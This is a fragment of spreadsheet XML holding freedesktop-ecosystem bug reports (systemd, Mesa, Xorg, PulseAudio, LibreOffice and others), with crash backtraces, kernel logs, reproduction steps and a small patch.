version.xserver-xorg-input-evdev: xserver-xorg-input-evdev 1:2.9.2-1ubuntu1
version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:7.5.0+git20150819-0ubuntu1
version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20150808-0ubuntu4
version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.11-1ubuntu3
xserver.bootTime: Fri Dec  4 08:49:37 2015
xserver.configfile: default
xserver.errors:
xserver.logfile: /var/log/Xorg.0.log
xserver.outputs:
Â product id                                8510
Â vendor                                     AUO
xserver.version: 2:1.17.2-1ubuntu9.1</t>
  </si>
  <si>
    <t>es20490446e</t>
  </si>
  <si>
    <t>SYSTEMD-88340</t>
  </si>
  <si>
    <t>Wierd Segfault in sd_rtnl_message_unref (libnss_myhostname.so.2 by sshd )</t>
  </si>
  <si>
    <t>On Arch X64 using 218-1 (first packaging of 218) I have run into the
following wierd problem.
When trying to connect to a ssh server running dualstack (both ipv4 and
ipv6) by ipv6 ssh segfaults when I have loaded the full ipv4 bgp
routing table (~500k+ routes). IPv4 connections works for some reason
and Ipv6 recovers if I kill the routing daemon (bird).
The stack trace of the core-file starts with
Stack trace of thread 515:
#0  0x00007f48334a3dd5 _int_free (libc.so.6)
#1  0x00007f4834a1e62a sd_rtnl_message_unref (libnss_myhostname.so.2)
#2  0x00007f4834a1e657 sd_rtnl_message_unref (libnss_myhostname.so.2)
And continues with that line (#1 and #2) until frame 63.
I have looked in src/libsystemd/sd-rtnl/rtnl-message.c and have two
observations (my C is very rusty so feel free to correct me).
Line 589 shouldn't the line
    if (m &amp;&amp; REFCNT_DEC(m-&gt;n_ref) &lt;=3D 0) {
be
    if (m &amp;&amp; REFCNT_DEC(m-&gt;n_ref) &gt;=3D 0) {
(I.e. greater-than-equal instead of less-than-equal)
Also perhaps a test of whether m-&gt;next is equal to m on line 597....</t>
  </si>
  <si>
    <t>svenne</t>
  </si>
  <si>
    <t>PULSEAUDIO-65349</t>
  </si>
  <si>
    <t>module-card-restore doesn't work properly with bluetooth</t>
  </si>
  <si>
    <t>module-bluetooth-device is loaded when the first audio profile is discovered. There may be other profiles appearing later. module-card-restore may have one of those later profiles stored and if so restoring the card profile fails. module-card-restore should monitor for new profiles and do the profile switch if the failed profile appears later.
This bug doesn't affect any released version.</t>
  </si>
  <si>
    <t>XORG-59825</t>
  </si>
  <si>
    <t>SIGSEGV: uninitialized variable framebuffer inside __glXDRIscreenProbe</t>
  </si>
  <si>
    <t>The following variable __DRIframebuffer framebuffer is not initialized in glxdri.c:960
framebuffer.base shall be initialized to NULL because in case of error (handle_error line 1140) framebuffer.base is checked... 
This bug trig a segmentation fault described in this back trace: http://pastebin.com/iJzw4edM.
For background information read the original bug report here : https://bugs.archlinux.org/task/33229</t>
  </si>
  <si>
    <t>benjarobin+freedesktop</t>
  </si>
  <si>
    <t>MESA-110045</t>
  </si>
  <si>
    <t>[radeonsi][clover][regression][bisected] cl-api-enqueue-copy-buffer hangs on radeonsi</t>
  </si>
  <si>
    <t>First bad commit:
commit a1378639ab19682a818ee627745db7f67485d406
Author: Marek OlÅ¡Ã¡k 
Date:   Thu Feb 7 00:01:13 2019 -0500
    radeonsi: always use compute rings for clover on CI and newer (v2)
    initialize all non-compute context functions to NULL.
    v2: fix SI
hangs on carrizo iceland raven. The benchmark can be stopped using crtl+c but the system is unstable after won't suspend hangs on reboot.</t>
  </si>
  <si>
    <t>DBUS-19502</t>
  </si>
  <si>
    <t>cleanups for sparse warnings and a build error</t>
  </si>
  <si>
    <t>Created attachment 21872
patch for warnings
Build breaks here because of -Werror in dbus-string.c not sure the fix I did is right but adding va_start() to init the var failed to work for me.
Attaching a patch.</t>
  </si>
  <si>
    <t>POPPLER-11346</t>
  </si>
  <si>
    <t>type3 fonts displayed wrong with poppler-0.5.9</t>
  </si>
  <si>
    <t>Using poppler-0.5.9 (with cairo-1.4.8 and evince-0.9.1) to display documents that contain type3 fonts such as http://www.tug.org/TUGboat/Articles/tb21-3/tb68goos.pdf (or the one above) renders those fonts displaced and at a smaller size (see figure 1 on page 5 from tb68goos.pdf).
I think this is a bug introduced in poppler-0.5.9 and xpdf-3.02 displays the page fine. And it happens using the cairo backend. The splash backend displays it fine.</t>
  </si>
  <si>
    <t>PKG-CONFIG-4795</t>
  </si>
  <si>
    <t>[PENDING] Man page documentation is misleading: PKG_CONFIG_LIBDIR</t>
  </si>
  <si>
    <t>PKG_CONFIG_LIBDIR
              Replaces the default pkg-config search directory.
It actually sets the pkg-config search PATH and overries and PKG_CONFIG_PATH if
set.  (The second is a little surprising but makes sense the first is a
noticable difference).</t>
  </si>
  <si>
    <t>nash</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-13185</t>
  </si>
  <si>
    <t>Requesting an account to do some code cleanup in the Unichrome driver.
Name: Benno Schulenberg
Email: bensberg@justemail.net
Preferred account name: benno</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-85996</t>
  </si>
  <si>
    <t>VA-API middle-ware (libmix) project</t>
  </si>
  <si>
    <t>We created a few vaapi driver projects (pvr-driver intel-driver etc) before. Now I would like to create a new repository to host VA-API middleware. Currently we/Intel have an open-source middle-ware implementation: libmix which includes OMX core/components and low level vaapi wrappers.
Could you help to create the repository vaapi/libmix?  With this we can push open source libmix into it and continue the development in community.
Thanks
-Austin</t>
  </si>
  <si>
    <t>yuanshengquan</t>
  </si>
  <si>
    <t>EXEMPI-97366</t>
  </si>
  <si>
    <t>Please support the OSTree Build API</t>
  </si>
  <si>
    <t>Created attachment 125816
Allow not running configure at the end of autogen
OSTree and Flatpak follow the Build API:
https://github.com/cgwalters/build-api
Exempi almost supports it the required changes are really trivial so it would be great to have it.</t>
  </si>
  <si>
    <t>bochecha</t>
  </si>
  <si>
    <t>LIBREOFFICE-58336</t>
  </si>
  <si>
    <t>UI Data bar&gt; Manage -  does not show the initially choosen color in options (Conditional Formatting)</t>
  </si>
  <si>
    <t>Select range
Formatting &gt; Conditional Formatting &gt; Data Bar
Choose More options
Change (one of) the Bar colors
 (look out for problems - see bug 58335 )
Close
Now Formatting &gt; Conditional Formatting &gt; Manage
Choose the relevant Range then Edit
In the now opened Conditional Formatting dialog More options
 &gt; the initial Light Blue and Light Red are the colors shown</t>
  </si>
  <si>
    <t>LIBREOFFICE-69271</t>
  </si>
  <si>
    <t>VIEWING: SVG - class= taking precendence over explicitely defined style= [Regression]</t>
  </si>
  <si>
    <t>Created attachment 85719
Particular SVG picture showing the regression and screenshots
Problem description: 
As of version 4.1.1 (possibly earlier) SVG picture Background - Gray.svg found in attached zip archive is not displayed correctly when inserted in LO Writer document.
Steps to reproduce:
1. Open the Front_page.odt document found in attached zip archive.
Current behavior:
In version 4.1.1 of LO Writer the picture is displayed in color instead of light gray. The light gray version of the picture was done by coloring colored version of the picture in light gray using Inkscape. As a result of that light gray color was defined explicitly in style= but the original color was left defined in class=. Here is an example from attached SVG:
&lt;circle
   ...
   style=fill:#e8e8e8fill-opacity:1
   ....
   class=fil24
/&gt;
where class fil24 is defined as:
.fil24 {fill:#2F6864}
In attached zip archive you will find screenshots of the document displayed in LO Writer version 4.0.5 and 4.1.1. It seems that class= is taking precedence over style= so picture is displayed colored instead of light gray.
The SVG picture is displayed correctly (light gray) in version 4.1.1 of LO Draw so only Writer is affected
Expected behavior:
Attached SVG picture should be displayed light gray.
Operating System: Ubuntu
Version: 4.1.1.2 release</t>
  </si>
  <si>
    <t>TELEPATHY-52146</t>
  </si>
  <si>
    <t>Crash when connection facebook account</t>
  </si>
  <si>
    <t>This crash happens if empathy-auth-client crash while doing the facebook auth which cause the channel to be closed then wocky receive the challenge and assert:
(telepathy-gabble:1192): wocky-DEBUG: Writing xml: 
(telepathy-gabble:1192): tp-glib/channel-DEBUG: tp_base_channel_close_dbus: called by :1.184
(telepathy-gabble:1192): gabble-DEBUG: gabble_server_tls_channel_close (server-tls-channel.c:305): Close() called on the TLS channel 0x10a6a40
(telepathy-gabble:1192): gabble-DEBUG: server_tls_channel_closed_cb (server-tls-manager.c:197): Server TLS channel closed.
(telepathy-gabble:1192): gabble-DEBUG: gabble_server_tls_channel_dispose (server-tls-channel.c:144): Dispose TLS channel
(telepathy-gabble:1192): gabble-DEBUG: gabble_server_tls_channel_finalize (server-tls-channel.c:127): Finalize TLS channel
(telepathy-gabble:1192): tp-glib/channel-DEBUG: tp_base_channel_close_dbus: called by :1.184
(telepathy-gabble:1192): gabble-DEBUG: gabble_server_sasl_channel_close (server-sasl-channel.c:958): called on 0x10a6ad0
(telepathy-gabble:1192): wocky-DEBUG: Parsing chunk: dmVyc2lvbj0xJm1ldGhvZD1hdXRoLnhtcHBfbG9naW4mbm9uY2U9QkYxNjRFMDE1OTkxRjdBQkIzMUIyOUYxQzAxNTUyQkU=
(telepathy-gabble:1192): wocky-DEBUG: _end_element_ns: Received stanza
* challenge xmlns='urn:ietf:params:xml:ns:xmpp-sasl'
    dmVyc2lvbj0xJm1ldGhvZD1hdXRoLnhtcHBfbG9naW4mbm9uY2U9QkYxNjRFMDE1OTkxRjdBQkIzMUIyOUYxQzAxNTUyQkU=
**
wocky:ERROR:wocky-auth-registry.c:426:wocky_auth_registry_challenge_async_func: assertion failed: (priv-&gt;handler != NULL)
Program received signal SIGABRT Aborted.
0x00007ffff5b9f445 in raise () from /lib/x86_64-linux-gnu/libc.so.6
(gdb) bt
#0  0x00007ffff5b9f445 in raise () from /lib/x86_64-linux-gnu/libc.so.6
#1  0x00007ffff5ba2bab in abort () from /lib/x86_64-linux-gnu/libc.so.6
#2  0x00007ffff5f8ed97 in g_assertion_message (domain=domain@entry=0x7ffff730b93b wocky file=file@entry=0x7ffff730ba1a wocky-auth-registry.c line=line@entry=426 
    func=func@entry=0x7ffff730bde0 wocky_auth_registry_challenge_async_func message=) at /build/buildd/glib2.0-2.33.3/./glib/gtestutils.c:1861
#3  0x00007ffff5f8f2b4 in g_assertion_message_expr (domain=domain@entry=0x7ffff730b93b wocky file=file@entry=0x7ffff730ba1a wocky-auth-registry.c line=line@entry=426 
    func=func@entry=0x7ffff730bde0 wocky_auth_registry_challenge_async_func expr=expr@entry=0x7ffff730ba04 priv-&gt;handler != NULL) at /build/buildd/glib2.0-2.33.3/./glib/gtestutils.c:1872
#4  0x00007ffff72d6b2e in wocky_auth_registry_challenge_async_func (self= challenge_data=0x76b680 callback=0x7ffff72fbe70  user_data=0xafc980)
    at wocky-auth-registry.c:426
#5  0x00007ffff72fc17b in sasl_auth_stanza_received (source= res= user_data=user_data@entry=0xafc980) at wocky-sasl-auth.c:562
#6  0x00007ffff66e3fae in g_simple_async_result_complete (simple=0xa5f040) at /build/buildd/glib2.0-2.33.3/./gio/gsimpleasyncresult.c:767
#7  0x00007ffff73035e8 in _xmpp_connection_received_data (source=0x726040 result=0x7a9c20 user_data=) at wocky-xmpp-connection.c:562
#8  0x00007ffff66cebe4 in async_ready_callback_wrapper (source_object=0x726040 res=0x7a9c20 user_data=0xe29110) at /build/buildd/glib2.0-2.33.3/./gio/ginputstream.c:529
#9  0x00007ffff66e3fae in g_simple_async_result_complete (simple=0x7a9c20) at /build/buildd/glib2.0-2.33.3/./gio/gsimpleasyncresult.c:767
#10 0x00007ffff7307436 in wocky_tls_job_result_gssize (job= result=160) at wocky-tls.c:369
#11 0x00007ffff66cebe4 in async_ready_callback_wrapper (source_object=0x7a9d70 res=0x75d070 user_data=0x742480) at /build/buildd/glib2.0-2.33.3/./gio/ginputstream.c:529
#12 0x00007ffff66e3fae in g_simple_async_result_complete (simple=0x75d070) at /build/buildd/glib2.0-2.33.3/./gio/gsimpleasyncresult.c:767
#13 0x00007ffff66e40dc in complete_in_idle_cb (data=0x75d070) at /build/buildd/glib2.0-2.33.3/./gio/gsimpleasyncresult.c:779
#14 0x00007ffff5f6d8b5 in g_main_dispatch (context=0x72be60) at /build/buildd/glib2.0-2.33.3/./glib/gmain.c:2539
#15 g_main_context_dispatch (context=context@entry=0x72be60) at /build/buildd/glib2.0-2.33.3/./glib/gmain.c:3075
#16 0x00007ffff5f6dbe8 in g_main_context_iterate (context=0x72be60 block=block@entry=1 dispatch=dispatch@entry=1 self=)
    at /build/buildd/glib2.0-2.33.3/./glib/gmain.c:3146
#17 0x00007ffff5f6dfe2 in g_main_loop_run (loop=0x732270) at /build/buildd/glib2.0-2.33.3/./glib/gmain.c:3340
#18 0x00007ffff6ff0b52 in tp_run_connection_manager () from /usr/lib/x86_64-linux-gnu/libtelepathy-glib.so.0
#19 0x0000000000428c7c in gabble_main (argc=1 argv=0x7fffffffe068) at gabble.c:179
#20 0x00007ffff5b8a76d in __libc_start_main () from /lib/x86_64-linux-gnu/libc.so.6
#21 0x0000000000428899 in _start ()</t>
  </si>
  <si>
    <t>POPPLER-5693</t>
  </si>
  <si>
    <t>Fix build with glibc 2.2 (0.5.0)</t>
  </si>
  <si>
    <t>For glibc 2.2 config.h needs to define additional symbols (LARGEFILE) before
including the system headers. The attached patch reshuffles the includes in
pdfinfo accordingly.</t>
  </si>
  <si>
    <t>XORG-52423</t>
  </si>
  <si>
    <t>Broken backlight selected when apple gmux backlight driver present</t>
  </si>
  <si>
    <t>Created attachment 64580
Prioritize apple gmux backlight driver
When the apple graphics muxer hardware is present then it is always the best choice for controlling the display backlight.  Currently the acpi0 driver is chosen which is completely broken on apple hardware when UEFI booting.</t>
  </si>
  <si>
    <t>austin.lund</t>
  </si>
  <si>
    <t>MESA-71134</t>
  </si>
  <si>
    <t>AMD Radeon 7790 (BONAIRE Sea Islands) rendering stability performance issues</t>
  </si>
  <si>
    <t>Created attachment 88495
dmesg
Hello I would like to report a list of issues I've run into after some time of using mesa gallium driver for AMD Radeon 7790 (BONAIRE Sea Islands chip).
Used components:
OS: Gentoo
User space packages:
media-libs/mesa git
sys-devel/llvm git
x11-libs/libdrm git
x11-libs/glamor git
x11-drivers/xf86-video-ati git
x11-base/xorg-server 1.14.3
Linux Kernel: 3.12.0-rc7
Rendering issues (tested with window managers: metacity and compiz):
- rendering corruption while scrolling web pages even if inbrowser hardware acceleration is disabled (in Chrome as well as in Firefox). There is kind of pixel offset on the diagonal of rendered web page and corruption of images borders (it happens only while scrolling).
- Taking screenshot and using gksu (I'm using gnome 2 environment) results in huge rendering slow down (about 1 fps). I have to reload a window manager to fix this issue.
- Introduced dpm to Sea Islands in 3.12 kernel (while enabled) leads to image corruption when moving windows playing videos (in a browser and a video player) scrolling websites. The corrupted image shows as flickering and messing around parts of the screen. The rendered image is ok only if nothing happens on the screen.
- anisotropic filtering doesn't seem to work (tested in sauerbraten game). After applaying there is no visual difference between bilinear filtering and anisotropic filtering.
Stability issues:
- Any use of OpenGL hardware acceleration after few minutes leads to GPU lockup (from basic OpenGL games like sauerbraten inbrowser hardware acceleration to compiz window manager). Glamor + metacity seems to work without GPU lockups.
- Playing videos in mplayer (VO: [vdpau]) also leads to a GPU lockup from time to time. The same happens in firefox browser while playing youtube videos in uvd decoding + flash 
Performance issues:
- I get much less fps compared to my old card - Radeon 4850 (r600g driver) even if the clocks are manually set to a maximal frequency.
- Compiz with basic effects is sometimes not fluent - drops to less than 30 fps especially when there are more windows opened.
I would like attach any GPU lockup logs but dmesg doesn't leave any trace. More than half of lockups are not recoverable and I have to reboot the computer.
Screens and logs are in the attachments.
Thank you for any help in resolving these issues.</t>
  </si>
  <si>
    <t>neatnoise</t>
  </si>
  <si>
    <t>XORG-4301</t>
  </si>
  <si>
    <t>Typo in lnx_ia64.c support file</t>
  </si>
  <si>
    <t>There is a typo in programs/Xserver/hw/xfree86/os-support/linux/lnx_ia64.c an
errant comma.</t>
  </si>
  <si>
    <t>ianw</t>
  </si>
  <si>
    <t>MESA-23594</t>
  </si>
  <si>
    <t>[G45] Mutter causes GPU hang</t>
  </si>
  <si>
    <t>Created attachment 29022
gpu dump
Mutter (the compositing manager for GNOME 3) is an excellent way to cause GPU hangs. The following hang was caused by running Mutter and OpenArena but pretty much any gl app more advanced than glxgears will cause a hang when Mutter is used.
[   94.888078] render error detected EIR: 0x00000010
[   94.888082]   IPEIR: 0x00000000
[   94.888084]   IPEHR: 0x60020100
[   94.888085]   INSTDONE: 0x808fffff
[   94.888087]   INSTPS: 0x0001f02e
[   94.888089]   INSTDONE1: 0x999fffa2
[   94.888090]   ACTHD: 0x0a173450
[   94.888092] page table error
[   94.888094]   PGTBL_ER: 0x01000000
[   94.888097] [drm:i915_handle_error] *ERROR* EIR stuck: 0x00000010 masking
System environment:
-- chipset: G45 / ICH10R
-- system architecture: 32-bit
-- Linux distribution: Debian unstable
-- Machine or mobo model: Asus P5Q-EM
-- Display connector: DVI
-- KMS: enabled
-- xf86-video-intel: 7c48c21b22bf5862c5a35bda1635753cc5a7197c
-- xserver: 1.6.3
-- mesa: 3c1172f06636ff4aec24a6c68df937844da73a53
-- drm: 73b59c894380995a2889b98e79acadd2da0bb237
-- kernel: 2.6.31-rc8 (debian)</t>
  </si>
  <si>
    <t>DEJAVU-7239</t>
  </si>
  <si>
    <t>lowercase cyrillic k is too much in the left</t>
  </si>
  <si>
    <t>Lowercase cyrillic k is too much in the left - screenshot is attached.  No time
to handle it right now.</t>
  </si>
  <si>
    <t>ogi</t>
  </si>
  <si>
    <t>MESA-97806</t>
  </si>
  <si>
    <t>GPU lockup with mesa-git and llvm-svn with rx 470 on Unigine Heaven and TombRaider 2013</t>
  </si>
  <si>
    <t>Just swithed from a R9 380 to a RX 470 from the first tests i have a GPU lockup on the first frames  with Unigine Heaven and Tom Raider 2013 benchmark.
* mesa-git a1e49b / llvm-svn trunk 281305
* AMD RX 470 nitro+ OC 8gB - AMD POLARIS10 (DRM 3.2.0 / 4.7.3-2-ARCH LLVM 4.0.0) (0x67df)
* latest linux-firmware
It doesn't lockup with mesa-12.0.2 with llvm-3.8.1
I've also tried mesa-git with llvm-3.8.1 and it doesn't lockup too.</t>
  </si>
  <si>
    <t>LIBREOFFICE-40102</t>
  </si>
  <si>
    <t>Multi-paragraph footnotes are not fully displayed when mouse is over the number</t>
  </si>
  <si>
    <t>Created attachment 50231
example.odt
Downstream bug may be found at:
https://bugs.launchpad.net/ubuntu/+source/libreoffice/+bug/150937
OOo bug may be found at:
http://openoffice.org/bugzilla/show_bug.cgi?id=42424
1) lsb_release -rd
Description: Ubuntu 11.04
Release: 11.04
2) apt-cache policy libreoffice-writer
libreoffice-writer:
  Installed: 1:3.3.3-1ubuntu2
  Candidate: 1:3.3.3-1ubuntu2
  Version table:
 *** 1:3.3.3-1ubuntu2 0
        100 /var/lib/dpkg/status
     1:3.3.2-1ubuntu5 0
        500 http://us.archive.ubuntu.com/ubuntu/ natty-updates/main i386 Packages
     1:3.3.2-1ubuntu4 0
        500 http://us.archive.ubuntu.com/ubuntu/ natty/main i386 Packages
3) What is expected to happen in Writer via the Terminal:
cd ~/Desktop &amp;&amp; wget https://bugs.launchpad.net/ubuntu/+source/libreoffice/+bug/150937/+attachment/2144278/+files/example.odt &amp;&amp; lowriter -nologo example.odt
and hover the mouse icon over the object is the entire footnote is displayed as it does in Word screenshot https://bugs.launchpad.net/ubuntu/+source/libreoffice/+bug/150937/+attachment/2144302/+files/Screenshot.png
4) What happens instead is it displays truncated.</t>
  </si>
  <si>
    <t>PULSEAUDIO-100451</t>
  </si>
  <si>
    <t>module-switch-on-port-available will only select unavailable ports when a new sink or source appears</t>
  </si>
  <si>
    <t>module-switch-on-port-available - the helper function new_sink_source
iterates over the device ports and picks the one with the highest priority
but then just before returning does this:
    if (p-&gt;available != PA_AVAILABLE_NO)
        return NULL
ie the selected port is returned _only_ if it is NOT available.
This logic error appears to be in pulseaudio 10.x also.
This is used by (for example):
  static pa_hook_result_t sink_new_hook_callback(pa_core *c pa_sink_new_data *new_data void *u) {
      pa_device_port *p = new_sink_source(new_data-&gt;ports new_data-&gt;active_port)
      if (p) {
          pa_log_debug(Switching initial port for sink '%s' to '%s' new_data-&gt;name p-&gt;name)
          pa_sink_new_data_set_port(new_data p-&gt;name)
      }
      return PA_HOOK_OK
  }
So this module will never choose an available port.
The p-&gt;available != PA_AVAILABLE_NO pattern appears all over the place in
this module but I _think_ this is the only place where it's used the
wrong way round.
The following fixed the symptom(s) here (and the pa -vvvv log indicated that
a more sensible set of choices was being made with it applied):
--- a/src/modules/module-switch-on-port-available.c
+++ b/src/modules/module-switch-on-port-available.c
@@ -2567 +2567 @@
                 p = i
     if (!p)
         return NULL
-    if (p-&gt;available != PA_AVAILABLE_NO)
+    if (p-&gt;available == PA_AVAILABLE_NO)
         return NULL
     pa_assert_se(p = find_best_port(ports))</t>
  </si>
  <si>
    <t>LIBREOFFICE-73162</t>
  </si>
  <si>
    <t>TOC/Index: when adding text separators content (like Entry #) preceding the text separator disappears from the generated text</t>
  </si>
  <si>
    <t>Created attachment 91341
Sample documents showing the issue in the TOC
Problem description: 
In the Insert Index/Tables dialog the Entry # dissapears from the Entry when adding other characters (for example in order to separate the entry number and the entry text with a dot or a space).
From the default TOC rendered in a new document:
  1First Heading
  1.1First Second-Level Heading
  1Second Heading
  1Third Heading
Editing the level 1 Entry in order to separate the entry #:
  1. First Heading
  1.1First Second-Level Heading
  1. Second Heading
  1. Third Heading
Actually this is the outcome (the entry # dissapears in the modified level):
  First Heading
  1.1First Second-Level Heading
  Second Heading
  Third Heading
Steps to reproduce:
1. Create a new document and add a few headings and a Table of Content. Enable numbering in the headings. This is the result of the attached Simple doc with TOC (original entry # visible).odt.
2. Edit the Table of Contents and in the Entry tab add .  after the E# item.
3. Click OK and back to the document. Not only the .  text is not added but the E# item has dissapeared altogether.
Current behavior:
The E# item dissapears when adding text.
Expected behavior:
Both the new text and the E# item stays and are visible in the generated index.
Operating System: Ubuntu
Version: 4.2.0.1 rc</t>
  </si>
  <si>
    <t>adler</t>
  </si>
  <si>
    <t>DRI-71333</t>
  </si>
  <si>
    <t>[PNV]igt/drv_hangman [   85.710189] [drm:i915_reset] *ERROR* Reset not implemented but ignoring error for simulated gpu hangs</t>
  </si>
  <si>
    <t>Created attachment 88808
dmesg
System Environment:
--------------------------
Platform: Pineview
Kernel:  (drm-intel-fixes)f02586dfedf1dfae4f5ff7eb1990a2c4c56e1425
Bug detailed description:
-------------------------
It causes [   85.710189] [drm:i915_reset] *ERROR* Reset not implemented but ignoring error for simulated gpu hangs on pineview with -fixes -queued and -nightly kernel.
output:
checking /sys/kernel/debug/dri/0/i915_error_state
rings stopped
gpu hang correctly detected
checking /sys/class/drm/card0/error
rings stopped
gpu hang correctly detected
Reproduce steps:
-------------------------
1. ./drv_hangman</t>
  </si>
  <si>
    <t>DRI-89550</t>
  </si>
  <si>
    <t>[SNB+ Regression bisected]igt/pm_rpm/universal-planes cause call trace</t>
  </si>
  <si>
    <t>Created attachment 114240
dmesg
==System Environment==
--------------------------
Regression: Yes bisect later
Non-working platforms: SNB
==kernel==
--------------------------
origin/drm-intel-nightly: f72a97e5af1d406f961958509cee53431fe61a46(2015-03-12)
==Bug detailed description==
-----------------------------
Run igt/pm_rpm/universal-planes  will cause call trace in dmesg:
[root@x-hnr9 ~]# dmesg -r|egrep |grep drm
[  126.993092] WARNING: CPU: 0 PID: 4073 at drivers/gpu/drm/drm_irq.c:1133 drm_wait_one_vblank+0x3b/0x16d [drm]()
[  126.993095] Modules linked in: dm_mod iTCO_wdt iTCO_vendor_support snd_hda_codec_hdmi ppdev snd_hda_codec_idt snd_hda_codec_generic joydev firewire_ohci pcspkr serio_raw uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core v4l2_common videodev snd_hda_intel lpc_ich snd_hda_controller mfd_core snd_hda_codec snd_hwdep snd_pcm firewire_core snd_timer crc_itu_t snd soundcore wmi battery parport_pc parport tpm_infineon tpm_tis tpm ac acpi_cpufreq i915 button video drm_kms_helper drm
[  126.993117] CPU: 0 PID: 4073 Comm: pm_rpm Not tainted 4.0.0-rc3_drm-intel-nightly_f72a97_20150312+ #120
[  126.993141]  [] ? drm_wait_one_vblank+0x3b/0x16d [drm]
[  126.993150]  [] ? drm_wait_one_vblank+0x3b/0x16d [drm]
[  126.993173]  [] ? drm_plane_helper_commit+0x16c/0x224 [drm_kms_helper]
[  126.993208]  [] ? drm_mode_set_config_internal+0x4e/0xd2 [drm]
[  126.993215]  [] ? drm_mode_setcrtc+0x3fe/0x4f4 [drm]
[  126.993221]  [] ? drm_ioctl+0x344/0x3b3 [drm]
[  126.993230]  [] ? drm_mode_setplane+0x1dc/0x1dc [drm]
[root@x-hnr9 ~]# dmesg -r|egrep 
[    3.334805] ACPI: Deprecated procfs I/F for AC is loaded please retry with CONFIG_ACPI_PROCFS_POWER cleared
[    3.348697] ACPI Warning: SystemIO range 0x0000000000000428-0x000000000000042f conflicts with OpRegion 0x0000000000000400-0x000000000000047f (\PMIO) (20150204/utaddress-258)
[    3.348884] ACPI Warning: SystemIO range 0x0000000000000540-0x000000000000054f conflicts with OpRegion 0x0000000000000500-0x0000000000000563 (\GPIO) (20150204/utaddress-258)
[    3.349053] ACPI Warning: SystemIO range 0x0000000000000530-0x000000000000053f conflicts with OpRegion 0x0000000000000500-0x0000000000000563 (\GPIO) (20150204/utaddress-258)
[    3.349220] ACPI Warning: SystemIO range 0x0000000000000500-0x000000000000052f conflicts with OpRegion 0x0000000000000500-0x0000000000000563 (\GPIO) (20150204/utaddress-258)
[    3.349387] lpc_ich: Resource conflict(s) found affecting gpio_ich
[    3.385912] ACPI: Deprecated procfs I/F for battery is loaded please retry with CONFIG_ACPI_PROCFS_POWER cleared
[    3.385995] ACPI: Deprecated procfs I/F for battery is loaded please retry with CONFIG_ACPI_PROCFS_POWER cleared
[    5.271944] systemd[1]: Failed to insert module 'ipv6'
[    6.491482] systemd-readahead[2586]: Failed to create fanotify object: Function not implemented
[  126.993078] ------------[ cut here ]------------
[  126.993092] WARNING: CPU: 0 PID: 4073 at drivers/gpu/drm/drm_irq.c:1133 drm_wait_one_vblank+0x3b/0x16d [drm]()
[  126.993094] vblank not available on crtc 0 ret=-22
[  126.993095] Modules linked in: dm_mod iTCO_wdt iTCO_vendor_support snd_hda_codec_hdmi ppdev snd_hda_codec_idt snd_hda_codec_generic joydev firewire_ohci pcspkr serio_raw uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core v4l2_common videodev snd_hda_intel lpc_ich snd_hda_controller mfd_core snd_hda_codec snd_hwdep snd_pcm firewire_core snd_timer crc_itu_t snd soundcore wmi battery parport_pc parport tpm_infineon tpm_tis tpm ac acpi_cpufreq i915 button video drm_kms_helper drm
[  126.993117] CPU: 0 PID: 4073 Comm: pm_rpm Not tainted 4.0.0-rc3_drm-intel-nightly_f72a97_20150312+ #120
[  126.993118] Hardware name: Hewlett-Packard HP EliteBook 8460p/161C BIOS 68SCF Ver. F.22 12/22/2011
[  126.993120]  0000000000000000 0000000000000009 ffffffff81794128 ffff8800ae87ba38
[  126.993122]  ffffffff8103bd5a 0000000100000000 ffffffffa0005f43 0000000000000000
[  126.993125]  ffff8800b8186000 0000000000000000 ffff8800b8146800 ffffffffa010c870
[  126.993127] Call Trace:
[  126.993132]  [] ? dump_stack+0x40/0x50
[  126.993135]  [] ? warn_slowpath_common+0x98/0xb0
[  126.993141]  [] ? drm_wait_one_vblank+0x3b/0x16d [drm]
[  126.993144]  [] ? warn_slowpath_fmt+0x45/0x4a
[  126.993150]  [] ? drm_wait_one_vblank+0x3b/0x16d [drm]
[  126.993153]  [] ? __pm_runtime_resume+0x5b/0x6a
[  126.993169]  [] ? intel_finish_crtc_commit+0x47/0x10b [i915]
[  126.993173]  [] ? drm_plane_helper_commit+0x16c/0x224 [drm_kms_helper]
[  126.993176]  [] ? kmemdup+0x18/0x2c
[  126.993188]  [] ? __intel_set_mode+0x313/0x8bd [i915]
[  126.993200]  [] ? intel_crtc_set_config+0x89a/0xbaa [i915]
[  126.993208]  [] ? drm_mode_set_config_internal+0x4e/0xd2 [drm]
[  126.993215]  [] ? drm_mode_setcrtc+0x3fe/0x4f4 [drm]
[  126.993221]  [] ? drm_ioctl+0x344/0x3b3 [drm]
[  126.993224]  [] ? sprintf+0x46/0x4b
[  126.993230]  [] ? drm_mode_setplane+0x1dc/0x1dc [drm]
[  126.993233]  [] ? do_vfs_ioctl+0x360/0x424
[  126.993236]  [] ? __audit_syscall_entry+0xb3/0xd3
[  126.993238]  [] ? syscall_trace_enter_phase1+0x11a/0x123
[  126.993241]  [] ? SyS_ioctl+0x49/0x7a
[  126.993243]  [] ? int_check_syscall_exit_work+0x34/0x3d
[  126.993245]  [] ? system_call_fastpath+0x12/0x17
[  126.993247] ---[ end trace 2fd9622063df10d9 ]---
==Reproduce steps==
---------------------------- 
./pm_rpm --run-subtest universal-planes</t>
  </si>
  <si>
    <t>ORC-55242</t>
  </si>
  <si>
    <t>PPC64 fixes</t>
  </si>
  <si>
    <t>A fellow openSUSE contributor added a patch to the package to fix PPC64 issues which in turn also made the test suite pass on PPC64.
Kindly evaluate the patch and consider it to be merged upstream.</t>
  </si>
  <si>
    <t>dominique-freedesktop.org</t>
  </si>
  <si>
    <t>XORG-9538</t>
  </si>
  <si>
    <t>libXfont scanfont.c fails to compile on HPUX</t>
  </si>
  <si>
    <t>libXfont scanfont.c fails to compile on HPUX due to #define FILE etc in the
file. hpux in the scanfont includes eventually includes stdio.h which causes a
build failure.
The attached patch is a big hack. On hpux it #defines _STDIO_INCLUDED which is
the guard define to prevent multiple inclusion of /usr/include/stdio.h but it
does allow compilation to succeed.</t>
  </si>
  <si>
    <t>LIBREOFFICE-70796</t>
  </si>
  <si>
    <t>MAILMERGE: Greek letter Ï… (lower Upsilon) error when sending plain-text or html emails</t>
  </si>
  <si>
    <t>Created attachment 88029
